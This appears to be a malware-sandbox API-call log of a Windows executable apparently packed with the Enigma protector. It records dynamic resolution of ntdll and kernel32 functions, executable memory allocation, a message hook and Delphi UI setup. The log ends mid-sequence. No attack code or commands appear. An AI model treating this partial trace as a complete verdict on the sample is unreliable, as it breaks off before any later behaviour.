GetProcAddress (hModule=0x77c40000, lpProcName="ZwSetVolumeInformationFile") returned 0x77c61c8c [0044.143] GetProcAddress (hModule=0x77c40000, lpProcName="ZwOpenKeyEx") returned 0x77c61008 [0044.143] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateProcess") returned 0x77c60804 [0044.144] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateProcessEx") returned 0x77c5ffdc [0044.144] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateUserProcess") returned 0x77c6090c [0044.144] GetProcAddress (hModule=0x77c40000, lpProcName="ZwResumeThread") returned 0x77c60058 [0044.144] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateThread") returned 0x77c5fff4 [0044.144] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryInformationProcess") returned 0x77c5fac8 [0044.144] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryVirtualMemory") returned 0x77c5fbc8 [0044.144] GetProcAddress (hModule=0x77c40000, lpProcName="ZwDeviceIoControlFile") returned 0x77c5f8fc [0044.144] GetProcAddress (hModule=0x77c40000, lpProcName="ZwUnmapViewOfSectionEx") returned 0x0 [0044.145] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0044.145] GetProcAddress (hModule=0x77c40000, lpProcName="ZwProtectVirtualMemory") returned 0x77c60028 [0044.146] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0044.146] GetProcAddress (hModule=0x77c40000, lpProcName="ZwClose") returned 0x77c5f9d0 [0044.146] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0044.146] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryInformationFile") returned 0x77c5fa00 [0044.146] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0044.146] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSetInformationFile") returned 0x77c5fc28 [0044.146] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0044.146] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateFile") returned 0x77c600a4 [0044.146] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0044.147] GetProcAddress (hModule=0x77c40000, lpProcName="ZwWriteFile") returned 0x77c5f918 [0044.168] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7cc | out: lpPerformanceCount=0x41f7cc*=16435190954) returned 1 [0044.298] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x1) returned 0xe0000 [0044.299] SysReAllocStringLen (in: pbstr=0x14ef8d8*=0x0, psz="enigma_ide.dll", len=0xe | out: pbstr=0x14ef8d8*="enigma_ide.dll") returned 1 [0044.386] GetDC (hWnd=0x0) returned 0x440109d2 [0044.387] GetDeviceCaps (hdc=0x440109d2, index=90) returned 96 [0044.387] ReleaseDC (hWnd=0x0, hDC=0x440109d2) returned 1 [0044.437] GetDC (hWnd=0x0) returned 0x440109d2 [0044.437] GetDeviceCaps (hdc=0x440109d2, index=104) returned 0 [0044.438] ReleaseDC (hWnd=0x0, hDC=0x440109d2) returned 1 [0044.438] CreatePalette (plpal=0x41f3c0) returned 0xffffffffa70807c3 [0044.438] GetStockObject (i=7) returned 0x1b00017 [0044.438] GetStockObject (i=5) returned 0x1900015 [0044.438] GetStockObject (i=13) returned 0x18a002e [0044.438] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0044.438] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0044.516] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x77130000 [0044.543] LoadStringA (in: hInstance=0x13ce000, uID=0xff28, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4 [0044.543] LoadStringA (in: hInstance=0x13ce000, uID=0xff27, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5 [0044.543] LoadStringA (in: hInstance=0x13ce000, uID=0xff26, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6 [0044.544] LoadStringA (in: hInstance=0x13ce000, uID=0xff25, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3 [0044.544] LoadStringA (in: hInstance=0x13ce000, uID=0xff24, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3 [0044.544] LoadStringA (in: hInstance=0x13ce000, uID=0xff23, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4 [0044.544] LoadStringA (in: hInstance=0x13ce000, uID=0xff22, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5 [0044.544] LoadStringA (in: hInstance=0x13ce000, uID=0xff21, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2 [0044.544] LoadStringA (in: hInstance=0x13ce000, uID=0xff20, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4 [0044.544] LoadStringA (in: hInstance=0x13ce000, uID=0xff3f, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4 [0044.544] LoadStringA (in: hInstance=0x13ce000, uID=0xff3e, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3 [0044.544] LoadStringA (in: hInstance=0x13ce000, uID=0xff3d, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4 [0044.544] LoadStringA (in: hInstance=0x13ce000, uID=0xff3c, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4 [0044.544] LoadStringA (in: hInstance=0x13ce000, uID=0xff3b, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5 [0044.544] LoadStringA (in: hInstance=0x13ce000, uID=0xff3a, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5 [0044.544] LoadStringA (in: hInstance=0x13ce000, uID=0xff39, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3 [0044.544] LoadStringA (in: hInstance=0x13ce000, uID=0xff38, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3 [0044.544] LoadStringA (in: hInstance=0x13ce000, uID=0xff37, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4 [0044.736] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0ec [0044.736] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fd [0044.736] GetCurrentThreadId () returned 0xba4 [0044.766] GlobalAddAtomA (lpString="EnigmaWndProcPtr013C000000000BA4") returned 0xc166 [0044.794] LoadStringA (in: hInstance=0x13ce000, uID=0xfee3, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb [0044.794] LoadStringA (in: hInstance=0x13ce000, uID=0xfee2, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc [0044.794] LoadStringA (in: hInstance=0x13ce000, uID=0xfee1, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11 [0044.794] LoadStringA (in: hInstance=0x13ce000, uID=0xfee0, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8 [0044.794] LoadStringA (in: hInstance=0x13ce000, uID=0xfeff, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe [0044.794] LoadStringA (in: hInstance=0x13ce000, uID=0xfefe, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa [0044.794] LoadStringA (in: hInstance=0x13ce000, uID=0xfefd, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4 [0044.794] LoadStringA (in: hInstance=0x13ce000, uID=0xfefc, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9 [0044.794] LoadStringA (in: hInstance=0x13ce000, uID=0xfefb, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf [0044.794] LoadStringA (in: hInstance=0x13ce000, uID=0xfefa, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9 [0044.794] LoadStringA (in: hInstance=0x13ce000, uID=0xfef9, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf [0044.794] LoadStringA (in: hInstance=0x13ce000, uID=0xfef8, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15 [0044.794] LoadStringA (in: hInstance=0x13ce000, uID=0xfef7, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10 [0044.794] LoadStringA (in: hInstance=0x13ce000, uID=0xfef6, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf [0044.794] LoadStringA (in: hInstance=0x13ce000, uID=0xfef5, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe [0044.794] LoadStringA (in: hInstance=0x13ce000, uID=0xfef4, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14 [0044.794] LoadStringA (in: hInstance=0x13ce000, uID=0xfef3, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9 [0044.794] LoadStringA (in: hInstance=0x13ce000, uID=0xfef2, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7 [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xfef1, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xfef0, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff0f, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff0e, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10 [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff0d, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff0c, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff0b, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15 [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff0a, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff09, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff08, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff07, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5 [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff06, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8 [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff05, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff04, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5 [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff03, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4 [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff02, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7 [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff01, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4 [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff00, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6 [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff1f, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4 [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff1e, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3 [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff1d, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6 [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff1c, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4 [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff1b, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4 [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff1a, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6 [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff19, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4 [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff18, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5 [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff17, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5 [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff16, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6 [0044.795] LoadStringA (in: hInstance=0x13ce000, uID=0xff15, lpBuffer=0x41f3bc, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5 [0044.824] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc168 [0044.824] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc16a [0044.917] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x75590000 [0044.917] GetProcAddress (hModule=0x75590000, lpProcName="InitializeFlatSB") returned 0x755c266f [0044.917] GetProcAddress (hModule=0x75590000, lpProcName="UninitializeFlatSB") returned 0x755c2542 [0044.918] GetProcAddress (hModule=0x75590000, lpProcName="FlatSB_GetScrollProp") returned 0x755c1d29 [0044.918] GetProcAddress (hModule=0x75590000, lpProcName="FlatSB_SetScrollProp") returned 0x755c238d [0044.918] GetProcAddress (hModule=0x75590000, lpProcName="FlatSB_EnableScrollBar") returned 0x755c20c9 [0044.918] GetProcAddress (hModule=0x75590000, lpProcName="FlatSB_ShowScrollBar") returned 0x755c1fdb [0044.918] GetProcAddress (hModule=0x75590000, lpProcName="FlatSB_GetScrollRange") returned 0x755c1e8d [0044.918] GetProcAddress (hModule=0x75590000, lpProcName="FlatSB_GetScrollInfo") returned 0x755c1f0f [0044.918] GetProcAddress (hModule=0x75590000, lpProcName="FlatSB_GetScrollPos") returned 0x755c1ccd [0044.918] GetProcAddress (hModule=0x75590000, lpProcName="FlatSB_SetScrollPos") returned 0x755c216d [0044.918] GetProcAddress (hModule=0x75590000, lpProcName="FlatSB_SetScrollInfo") returned 0x755c22be [0044.919] GetProcAddress (hModule=0x75590000, lpProcName="FlatSB_SetScrollRange") returned 0x755c21e2 [0044.947] GetModuleHandleA (lpModuleName="User32.dll") returned 0x77130000 [0044.947] GetProcAddress (hModule=0x77130000, lpProcName="SetLayeredWindowAttributes") returned 0x7716ec88 [0044.947] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc0c3 [0045.031] GetVersion () returned 0x1db10106 [0045.031] GetCurrentProcessId () returned 0xba0 [0045.083] GlobalAddAtomA (lpString="EnigmaDelphi00000BA0") returned 0xc165 [0045.083] GetCurrentThreadId () returned 0xba4 [0045.083] GlobalAddAtomA (lpString="EnigmaControlOfs013C000000000BA4") returned 0xc164 [0045.083] RegisterClipboardFormatA (lpszFormat="ControlOfs013C000000000BA4") returned 0xc169 [0045.083] GetProcAddress (hModule=0x77130000, lpProcName="GetMonitorInfoA") returned 0x77154413 [0045.083] GetProcAddress (hModule=0x77130000, lpProcName="GetSystemMetrics") returned 0x77147d2f [0045.083] GetSystemMetrics (nIndex=19) returned 1 [0046.217] GetSystemMetrics (nIndex=75) returned 1 [0046.217] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0xae188c, fWinIni=0x0 | out: pvParam=0xae188c) returned 1 [0046.241] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0046.241] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0046.241] LoadCursorA (hInstance=0x13c0000, lpCursorName=0x7ff9) returned 0x0 [0046.242] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0046.242] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0046.242] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0046.242] LoadCursorA (hInstance=0x13c0000, lpCursorName=0x7ffa) returned 0x0 [0046.242] LoadCursorA (hInstance=0x13c0000, lpCursorName=0x7ffb) returned 0x0 [0046.242] LoadCursorA (hInstance=0x13c0000, lpCursorName=0x7ffc) returned 0x0 [0046.242] LoadCursorA (hInstance=0x13c0000, lpCursorName=0x7ffd) returned 0x0 [0046.242] LoadCursorA (hInstance=0x13c0000, lpCursorName=0x7fff) returned 0x0 [0046.242] LoadCursorA (hInstance=0x13c0000, lpCursorName=0x7ffe) returned 0x0 [0046.242] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0046.242] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0046.242] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0046.242] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0046.242] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0046.242] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0046.242] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0046.242] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0046.242] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0046.242] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0046.242] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0046.243] GetDC (hWnd=0x0) returned 0x440109d2 [0046.243] GetDeviceCaps (hdc=0x440109d2, index=90) returned 96 [0046.243] ReleaseDC (hWnd=0x0, hDC=0x440109d2) returned 1 [0046.243] GetProcAddress (hModule=0x77130000, lpProcName="EnumDisplayMonitors") returned 0x7715451a [0046.243] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x145014c, dwData=0xae1ad8) returned 1 [0046.316] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x41f727, fWinIni=0x0 | out: pvParam=0x41f727) returned 1 [0046.317] CreateFontIndirectA (lplf=0x41f727) returned 0x260a01d3 [0046.317] GetObjectA (in: h=0x260a01d3, c=60, pv=0x41f518 | out: pv=0x41f518) returned 60 [0046.317] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x41f5d3, fWinIni=0x0 | out: pvParam=0x41f5d3) returned 1 [0046.317] CreateFontIndirectA (lplf=0x41f6af) returned 0x1c0a07d2 [0046.317] GetObjectA (in: h=0x1c0a07d2, c=60, pv=0x41f518 | out: pv=0x41f518) returned 60 [0046.318] CreateFontIndirectA (lplf=0x41f673) returned 0xc0a07c5 [0046.318] GetObjectA (in: h=0xc0a07c5, c=60, pv=0x41f518 | out: pv=0x41f518) returned 60 [0046.346] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0 [0046.355] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x41f687, nSize=0x100 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe")) returned 0x3a [0046.355] OemToCharA (in: pSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", pDst=0x41f687 | out: pDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe") returned 1 [0046.706] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0xf0000 [0046.955] GetKeyboardLayoutList (in: nBuff=64, lpList=0x41f608 | out: lpList=0x41f608) returned 1 [0047.230] GetModuleHandleA (lpModuleName="USER32") returned 0x77130000 [0047.230] GetProcAddress (hModule=0x77130000, lpProcName="AnimateWindow") returned 0x7715b531 [0047.300] SysReAllocStringLen (in: pbstr=0x14f03dc*=0x0, psz="Help", len=0x4 | out: pbstr=0x14f03dc*="Help") returned 1 [0047.301] SysReAllocStringLen (in: pbstr=0x14f03d8*=0x0, psz="YesToAll", len=0x8 | out: pbstr=0x14f03d8*="YesToAll") returned 1 [0047.301] SysReAllocStringLen (in: pbstr=0x14f03d4*=0x0, psz="NoToAll", len=0x7 | out: pbstr=0x14f03d4*="NoToAll") returned 1 [0047.301] SysReAllocStringLen (in: pbstr=0x14f03d0*=0x0, psz="All", len=0x3 | out: pbstr=0x14f03d0*="All") returned 1 [0047.301] SysReAllocStringLen (in: pbstr=0x14f03cc*=0x0, psz="Ignore", len=0x6 | out: pbstr=0x14f03cc*="Ignore") returned 1 [0047.301] SysReAllocStringLen (in: pbstr=0x14f03c8*=0x0, psz="Retry", len=0x5 | out: pbstr=0x14f03c8*="Retry") returned 1 [0047.301] SysReAllocStringLen (in: pbstr=0x14f03c4*=0x0, psz="Abort", len=0x5 | out: pbstr=0x14f03c4*="Abort") returned 1 [0047.301] SysReAllocStringLen (in: pbstr=0x14f03c0*=0x0, psz="Cancel", len=0x6 | out: pbstr=0x14f03c0*="Cancel") returned 1 [0047.301] SysReAllocStringLen (in: pbstr=0x14f03bc*=0x0, psz="OK", len=0x2 | out: pbstr=0x14f03bc*="OK") returned 1 [0047.301] SysReAllocStringLen (in: pbstr=0x14f03b8*=0x0, psz="No", len=0x2 | out: pbstr=0x14f03b8*="No") returned 1 [0047.301] SysReAllocStringLen (in: pbstr=0x14f03b4*=0x0, psz="Yes", len=0x3 | out: pbstr=0x14f03b4*="Yes") returned 1 [0047.388] GetTickCount () returned 0x1146078 [0047.388] GetTickCount () returned 0x1146078 [0047.388] GetCurrentThreadId () returned 0xba4 [0047.389] SetWindowsHookExW (idHook=3, lpfn=0x14792a8, hmod=0x0, dwThreadId=0xba4) returned 0xd00e3 [0047.519] RegisterClipboardFormatA (lpszFormat="TntUnicodeVcl.DestroyWindow") returned 0xc0e3 [0047.536] VirtualQuery (in: lpAddress=0x1460e6c, lpBuffer=0x41f764, dwLength=0x1c | out: lpBuffer=0x41f764*(BaseAddress=0x1460000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x2c1000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0047.536] GetCurrentProcessId () returned 0xba0 [0047.609] GetCurrentThreadId () returned 0xba4 [0047.703] GlobalAddAtomA (lpString="EnigmaDelphi00000BA0") returned 0xc165 [0047.720] GlobalAddAtomA (lpString="EnigmaControlOfs013C000000000BA4") returned 0xc164 [0047.754] LoadCursorA (hInstance=0x0, lpCursorName=0x7f89) returned 0x1001f [0047.754] DestroyCursor (hCursor=0x0) returned 0 [0047.771] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7cc | out: lpPerformanceCount=0x41f7cc*=16793604030) returned 1 [0047.916] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xb8 [0047.916] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xbc [0048.044] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.044] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0048.044] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.044] GetProcAddress (hModule=0x76d30000, lpProcName="DebugBreak") returned 0x76dc41b5 [0048.044] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.045] GetProcAddress (hModule=0x76d30000, lpProcName="FatalAppExitA") returned 0x76dc4691 [0048.045] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.045] GetProcAddress (hModule=0x76d30000, lpProcName="RtlRaiseException") returned 0x0 [0048.063] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.063] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0048.063] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.063] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0048.063] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.063] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0048.063] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.064] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0048.064] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.064] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingA") returned 0x76d45506 [0048.064] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.064] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingW") returned 0x76d41909 [0048.064] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.064] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0048.064] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.064] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0048.064] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.064] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0048.065] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.065] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0048.065] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.065] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFile") returned 0x76d418f1 [0048.065] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.065] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFileEx") returned 0x76d44c83 [0048.065] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.065] GetProcAddress (hModule=0x76d30000, lpProcName="UnmapViewOfFile") returned 0x76d41826 [0048.065] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.065] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0048.065] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.066] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExA") returned 0x76d44913 [0048.066] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.066] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0048.066] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.066] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0048.066] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.066] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0048.066] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.066] GetProcAddress (hModule=0x76d30000, lpProcName="FreeResource") returned 0x76d5d3db [0048.066] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.066] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0048.067] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.067] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0048.067] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.067] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0048.067] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 